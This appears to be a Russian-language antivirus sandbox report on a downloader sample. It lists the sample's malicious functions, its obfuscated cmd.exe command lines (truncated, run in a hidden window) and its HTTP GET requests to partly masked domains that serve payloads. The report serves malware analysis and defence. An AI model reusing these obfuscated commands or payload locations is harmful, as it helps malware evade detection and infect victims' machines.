Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c f^or ; ; /^F , " tokens= 1 delims=hof" ; %^b ; ^In ; , ( , ' ; , f^^tYPe , , ^| ; ; fIN^^d ; , "dfil" ; , ' , , ) , , DO ; %^b; ; ; VdBQq7eAr^/v8^ ^ ; , sTpcko/^c " , ...
Сетевая активность
Подключается к
- 'da####hkelly.com':80
- 'da####hkelly.com':443
- 'st#####productions.com':80
- 'st#####productions.com':443
- 'dm###git.com.tr':80
- 'bi###ritzjr.com':80
- 'we###eroids.ro':80
TCP
Запросы HTTP GET
- http://da####hkelly.com/LOSHOuRtLR/
- http://st#####productions.com/ulrKCFzG2/
- http://dm###git.com.tr/9iHI5gW6d9/
- http://bi###ritzjr.com/bOHg53ns/
Другие
- 'da####hkelly.com':443
- 'st#####productions.com':443
UDP
- DNS ASK da####hkelly.com
- DNS ASK st#####productions.com
- DNS ASK dm###git.com.tr
- DNS ASK bi###ritzjr.com
- DNS ASK we###eroids.ro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c f^or ; ; /^F , " tokens= 1 delims=hof" ; %^b ; ^In ; , ( , ' ; , f^^tYPe , , ^| ; ; fIN^^d ; , "dfil" ; , ' , , ) , , DO ; %^b; ; ; VdBQq7eAr^/v8^ ^ ; , sTpcko/^c " , ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c f^tYPe | fIN^d "dfil"
- '<SYSTEM32>\cmd.exe' /S /D /c" ftYPe "
- '<SYSTEM32>\find.exe' "dfil"
- '<SYSTEM32>\cmd.exe' ; ; ; VdBQq7eAr/v8 ; , sTpcko/c " , , (SE^t ^ `^ =7+0v5ph/dcP^H^xMwjzu^Z^\eAFKIay4Wq{^S:tr-^Osb,G}m.^2N =^oRC^(fn3^$Dg6ik^LU^l^1@'^9^)^;)&& , F^oR ; %^g ; ; In ; , ( ^ 5 48...
